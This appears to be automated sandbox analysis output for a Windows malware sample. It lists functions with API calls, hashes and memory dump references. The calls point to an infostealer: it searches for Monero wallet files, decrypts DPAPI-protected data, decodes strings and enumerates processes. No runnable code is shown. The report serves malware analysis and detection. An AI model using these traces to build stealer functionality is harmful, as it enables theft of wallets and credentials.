                                • Instruction Fuzzy Hash: ACB2D4F3A0C6009FE304AE29DC8567AFBE5EF94720F16893DE6C483744EA3598418797
                                Function 00EAE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EC0D79), ref: 00EAE5A2
                                • StrCmpCA.SHLWAPI(?,00EC15F0), ref: 00EAE5F2
                                • StrCmpCA.SHLWAPI(?,00EC15F4), ref: 00EAE608
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAECDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 59660dce6d12d398d0a9f2d70eae9473eaebd54f7ac2a43ec051e565596d3f98
                                • Instruction ID: babc368db64f97abb11dc3ab226efccc0baae1ecbfe404bcf500d5e1cf599908
                                • Opcode Fuzzy Hash: 59660dce6d12d398d0a9f2d70eae9473eaebd54f7ac2a43ec051e565596d3f98
                                • Instruction Fuzzy Hash: F8122271A10118ABCF14FB60DDA6EEE73B9AF54300F4455F8B51A76191EE306B48CFA2
                                Function 012F8A0E Relevance: 9.2, Strings: 6, Instructions: 1652COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: wu$-z{?$?o"K$@QJ$IX]$j}'o
                                • API String ID: 0-2850533717
                                • Opcode ID: 5ab19a898afd878977724c00ba292d69b0040f733106fe5e97d969ea836f80b3
                                • Instruction ID: 4787b6ec50320d3e085a5f97c7cc71fb965d748a4182dbbbe1b73ccc7fb86668
                                • Opcode Fuzzy Hash: 5ab19a898afd878977724c00ba292d69b0040f733106fe5e97d969ea836f80b3
                                • Instruction Fuzzy Hash: 98B208F360C6049FE3046E2DEC8567AF7EAEBD4720F16893DE6C4C3744EA3598058696
                                Function 00EAA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA23F
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00EA4F3E,00000000,?), ref: 00EAA251
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA27A
                                • LocalFree.KERNEL32(?,?,?,?,00EA4F3E,00000000,?), ref: 00EAA28F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: >O
                                • API String ID: 4291131564-1870091082
                                • Opcode ID: d3c0b276a1e99df76065f121db834421a0eea7ca217f5bc6fd7e7a9cd3b3e4fd
                                • Instruction ID: b7d0dfdd80e911585709342c06ffba09f229019ef45a3e333345022b926a8819
                                • Opcode Fuzzy Hash: d3c0b276a1e99df76065f121db834421a0eea7ca217f5bc6fd7e7a9cd3b3e4fd
                                • Instruction Fuzzy Hash: D011A474240308AFEB15CF64C895FAA77B5EB89B14F208458FD259F3D0C772A941CB50
                                Function 012F6F55 Relevance: 7.8, Strings: 5, Instructions: 1582COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !)*$Da{i$a1o$b!|$ro;
                                • API String ID: 0-437545789
                                • Opcode ID: ddefa042dd228e9eef368eb61e736542eafaf091766d5f1284c578cddf0c3abf
                                • Instruction ID: 0935b5629155010194cff2bc7a940832c7357da7b19f0fee0bbc2289f57f5c71
                                • Opcode Fuzzy Hash: ddefa042dd228e9eef368eb61e736542eafaf091766d5f1284c578cddf0c3abf
                                • Instruction Fuzzy Hash: AEB2F6F3A08200AFE7046E29EC8567ABBE9EF94720F1A493DE6C4C7344E67558058796
                                Function 00F0F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: \u$\u${${$}$}
                                • API String ID: 0-582841131
                                • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                • Instruction ID: 99db8b603c7dfbaa7df07b38bccc8865325db9d41d0313b703ad090544e10367
                                • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                • Instruction Fuzzy Hash: CC415012E19BD5C5CB058B7444A02AEBFB26FD5220F6D429AC49D1F7C2C774414EE3A5
                                Function 00EAC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EAC971
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EAC97C
                                • lstrcat.KERNEL32(?,00EC0B47), ref: 00EACA43
                                • lstrcat.KERNEL32(?,00EC0B4B), ref: 00EACA57
                                • lstrcat.KERNEL32(?,00EC0B4E), ref: 00EACA78
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 839e9c5c25bdecb2a70fd073da2f7bb1fcfde885112c4d0a55aa370c304c1e5f
                                • Instruction ID: 5363eb2a1a3e8469d683cc2e227aca1fcb4fb6902e622a132e1ad63409cdd88e
                                • Opcode Fuzzy Hash: 839e9c5c25bdecb2a70fd073da2f7bb1fcfde885112c4d0a55aa370c304c1e5f
                                • Instruction Fuzzy Hash: C3415EB590421EDBDB24CFA0DD89BFEB7B8BB49304F1041B8F509A6280D7706A84CF91
                                Function 00EB6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00EB6C0C
                                • sscanf.NTDLL ref: 00EB6C39
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EB6C52
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EB6C60
                                • ExitProcess.KERNEL32 ref: 00EB6C7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 799b313e3c01071b9811c1c6e887e5c8b0c49ff0dbb50a23ce73fd761d786baf
                                • Instruction ID: 74bb97b10f8089175c3b91115353ed826cc44278c4e558ed4c4e5e3647e1dcc5
                                • Opcode Fuzzy Hash: 799b313e3c01071b9811c1c6e887e5c8b0c49ff0dbb50a23ce73fd761d786baf
                                • Instruction Fuzzy Hash: 4321CD75D14208ABCF18EFE4E8459EEB7B5FF48300F048529E516F3254EB349644CB65
                                Function 00EA72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EA72AD
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA72B4
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EA72E1
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EA7304
                                • LocalFree.KERNEL32(?), ref: 00EA730E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 4c76f88fec89694603c680eb2207758aa75049885a88f0e3a4cd46ec637eb948
                                • Instruction ID: b1dbb272326707cc23c5a155aba828e742a5c2813cb6ee12f080d5400fffa35a
                                • Opcode Fuzzy Hash: 4c76f88fec89694603c680eb2207758aa75049885a88f0e3a4cd46ec637eb948
                                • Instruction Fuzzy Hash: 11010C75A44308BBDB24DFE4DD4AF9E7778AB48B04F104554FB15BA2C4D6B0AA408B64
                                Function 00EB9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB97AE
                                • Process32First.KERNEL32(00EC0ACE,00000128), ref: 00EB97C2
                                • Process32Next.KERNEL32(00EC0ACE,00000128), ref: 00EB97D7
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00EB97EC
                                • CloseHandle.KERNEL32(00EC0ACE), ref: 00EB980A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: ae35c08637c6df323588cb549a71bea9d6c1a094b1bcecb1f946cc6fa3b2422e
                                • Instruction ID: 7a8c95648c604794019b5bd2c297af933e2300a8af53172871a0d7f21171f576
                                • Opcode Fuzzy Hash: ae35c08637c6df323588cb549a71bea9d6c1a094b1bcecb1f946cc6fa3b2422e
                                • Instruction Fuzzy Hash: 77012175A10209EBDB28DFA4D948BEEB7F9BF08700F104599E519E7280EB309B80CF50
                                Function 00EC4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <7\h$huzx
                                • API String ID: 0-2989614873
                                • Opcode ID: b1959c369d596a5e5fa06e222f24d624f052ef4e8d009fdc83557cd618c55d78
                                • Instruction ID: d17dc9e95289d0bdb1b25d28b8753b9d96c7fe79ce3e36e640e033c58bf34122
                                • Opcode Fuzzy Hash: b1959c369d596a5e5fa06e222f24d624f052ef4e8d009fdc83557cd618c55d78
                                • Instruction Fuzzy Hash: 1E63417341EBD41EC727CB3047B6A927F66FA1331031859CEC4C1AB4B3C692AA56E356
                                Function 012ECB4B Relevance: 6.7, Strings: 4, Instructions: 1698COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
